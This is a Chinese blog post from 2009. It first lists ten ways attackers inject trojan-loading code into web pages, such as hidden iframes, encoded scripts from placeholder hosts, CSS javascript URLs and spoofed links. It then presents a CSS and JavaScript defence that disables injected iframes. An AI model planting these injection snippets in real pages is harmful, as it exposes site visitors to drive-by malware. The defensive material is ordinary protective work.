网页挂木马用的是代码及防范
2009-12-20 00:53
232 查看
一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加密 <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt ></script> muma.txt可改成任意后缀 四:body挂马 <body onload="window.location='地址';"></body> 五:隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src="http://www.xxx.com/muma.htm/ ";></iframe>'; 六:css中挂马 body { background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js ></script>")')} 七:JAJA挂马 <SCRIPT language=javascript> window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 八:图片伪装 <html> <iframe src="网马地址" height=0 width=0></iframe> <img src="图片地址"></center> </html> 九:伪装调用: <frameset rows="444,0" cols="*"> <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 十:高级欺骗 <a href="http://www.163.com (迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a> <SCRIPT Language="JavaScript"> function www_163_com () { var url="网马地址"; open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); } 如何防止网页中 iframe挂木马 因为FF(Firefox)不怕IFRAME ,于是就拿IE开刀,不知道比尔有没有奖发。我只写了一句代码,就搞定了,哈,痛快。就是IE only(特有的)的CSS中的属性expression,插进去试试,果然那些IFRAME 不起作用了。 本文出处:http://www.yutianedu.com/52network/dispbbs.asp?boardid=116&id=12721 代码如下: <style type="text/css" media="all" id="http://windecember.cn "> /*<![CDATA[*/ iframe{ v:expression(this.src='about:blank',this.outerHTML='');/*使用IE Only 的样式会除所有 IFRAME */ } #f126{v:expression() !important} //如果要使自己的IFRAME可以执行,在自己的IFRAME里加上ID="f126"; /*]]>*/ </style> 分析: 前缀:expression(表达式); 这个前缀是可以随意更换的,我上面取名为"v",例如我可以换成:abc123:expression(this.src='about: blank',this.outerHTML=''); 挂木马的家伙得先看你的CSS里这个前缀,然后挂马的时候写成这样<iframe style="abc123:expression() !important" src="URL"></iframe>,那个前缀一定要是和你的网站一样的(abc123),才能挂到马,哈哈哈!如果把前缀做成动 态的,就非常OK了,看你怎么挂! 优点: 可以解决一些站长的烦恼,无须去理会人家插了多少IFRAME木马,那些IFRAME都不起作用; 保护了访客的安全,这些IFRAME不执行,不下载,就不会破坏到访问的电脑; 代码简单,仅一句CSS样式,不管你是ASP,ASP.NET,JSP,PHP还是RUBY,都通用; 缺点: 只适合防御目前的挂IFRAME方案; 使 得人家挂马的方式要改变了,挂马者可以构造这样的代码<iframe style="v:expression() !important" src="URL"></iframe>使我的防御方式失效,不过挂马都一定得看我的CSS里expression前面的这个"v" 字母,我可以换成任意的如:xgz:expression(...),哈哈哈,他也拿我没办法,再如,如果我这个前缀是变化的,是不是也行吖 *_* 不能防御其他标记的马,如<script>、<applet>、<object>等。 到那时候再来找我吧,呵呵~ 网页里插入的IFRAME还是存在,只是不起作用了; 再加固防线,加入以下JS代码——其实这个代码可以完全不用: <script type="text/javascript" language="javascript"> //<![CDATA[ function killfrm() { var xgzfrm=document.getElementsByTagName("iframe"); for(var i=0;i<xgzfrm.length;i++)//循环检查所有IFRAME标记,把所有IFRAME的URL都改为空白页,然后删除IFRMAE标记; { xgzfrm[i].src='about:blank'; xgzfrm[i].outerHTML=''; } } window.onload=killfrm;//一边加载页面,一边执行这个JS方法; //]]> </script> 另外转一种解决方案——这种方案不知道管不管用,没试过,方法如下: 在网页最后加入<xmp>,再用css控制它的显示方式,如:xmp { width:1px; overflow:hidden; text-overflow:clip; white-space: nowrap; clear: none; float: none; line-height: 0px; display: inline; } </SCRIPT>
相关文章推荐
- “灰鸽子”网页木马从原理、制作到防范(图)
- 网页防右键|防选择js代码|不能复制|防|网页ico图标|网页防木马
- 二行代码解决全部网页木马
- 网页木马攻击原理及防范
- “灰鸽子”网页木马从原理、制作到防范
- 二行代码解决全部网页木马(含iframe/script木马)
- 三行代码解决全部网页木马
- 二行代码解决全部网页木马
- 全世界最小的php网页木马一枚 附PHP木马的防范方法
- 二行代码解决全部网页木马(含iframe/script木马)
- 网页木马代码例子(里面的文件是漏洞扫描器,呵呵)
- 防范网页木马
- 小心防范网页木马
- 二行代码解决全部网页木马
- 二行代码解决全部网页木马(含iframe/script木马)
- 个人(商业)网站安全维护-网页木马防范
- 网页木马代码备份
- 网页恶意代码防范技巧
- 全世界最小的php网页木马一枚 附PHP木马的防范方法
- 网页常见木马代码